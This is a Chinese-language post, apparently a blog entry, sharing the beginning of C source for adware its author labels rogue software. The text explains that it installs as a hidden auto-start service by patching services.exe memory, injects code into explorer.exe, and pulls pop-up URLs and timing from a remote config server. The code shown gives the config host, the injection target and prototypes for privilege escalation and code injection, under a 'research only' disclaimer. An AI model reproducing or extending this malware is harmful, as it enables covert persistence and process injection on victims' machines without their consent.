ps:请勿用于非法用途，仅供技术研究之用。 
by：yunshu 
这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹……程序安装成服务，并设置为自动启动。启动之后写入一段代码到explorer.exe进程中，也就是这里在弹网页，然后将服务停止。 
我写的代码没什么技术含量，唯一的是使用了我们team的zzzevazzz的隐藏服务代码，最开始他是发在ph4nt0m的核心区的。不过他已经在自己的blog写过，所以我发出来也没问题了。 
这个是主函数，安装，读取配置，注入代码用的。 
代码: 
/************************************************************************************************** 
* 1. 给XX作的流氓软件 
* 2. 隐藏服务是copy的EVA的代码，修改Services.exe进程内存。 
**************************************************************************************************/ 
#include 
#include 
#include 
#include 
#include 
// 是否记录日志 
//#define DEBUG 
#ifdef DEBUG 
#define DEBUG_LOG "c:\debug.txt" 
// 日志记录函数 
void LogToFile( WCHAR * ); 
#endif 
#include "ControlService.h" 
#include "HideService.h" 
#include "CustomFunction.h" 
#pragma comment (lib, "Advapi32.lib") 
#pragma comment (lib, "Shell32.lib") 
#pragma comment (lib, "ws2_32.lib") 
#pragma comment (lib, "User32.lib") 
#define REMOTE_FUNC_LENGTH 1024 * 10 // 拷贝的长度 
#define TARGET_PROCESS L"explorer.exe" // 要注入代码的目标进程 
#define CONFIG_HOST "www.icylife.net" // 读取配置信息的服务器 
#define CONFIG_PATH "/url.txt" // 配置信息在配置服务器的路径 
#define IE_PATH "C:\Program Files\Internet Explorer\iexplore.exe" 
#define DEFAULT_URL "http://www.he100.com" // 默认弹出的窗口 
#define DEFAULT_SLEEP_TIME 30 * 60 * 1000 // 默认弹出窗口的间隔时间 
// 宏，转换字符串为unicode 
#define MULTI_TO_WIDE( x, y ) MultiByteToWideChar( CP_ACP, MB_PRECOMPOSED,y,-1,x,_MAX_PATH ); 
// 弹出窗口之间的间隔时间 
int sleep_time; 
// 弹出的url地址 
char url_path[512] = { 0 }; 
/************************************************************************************************** 
* 函数原形 
**************************************************************************************************/ 
void ServiceMain( DWORD, char **); //服务入口 
BOOL SetDebugPrivilege( ); //获取debug权限 
DWORD GetProcessIdByName(WCHAR * ); //获取进程的PID 
void InjectCode( ); //写代码到远程进程 
void GetConfig( ); //更新配置，获取要弹出的地址和弹出间隔时间 
/**************************************************************************************************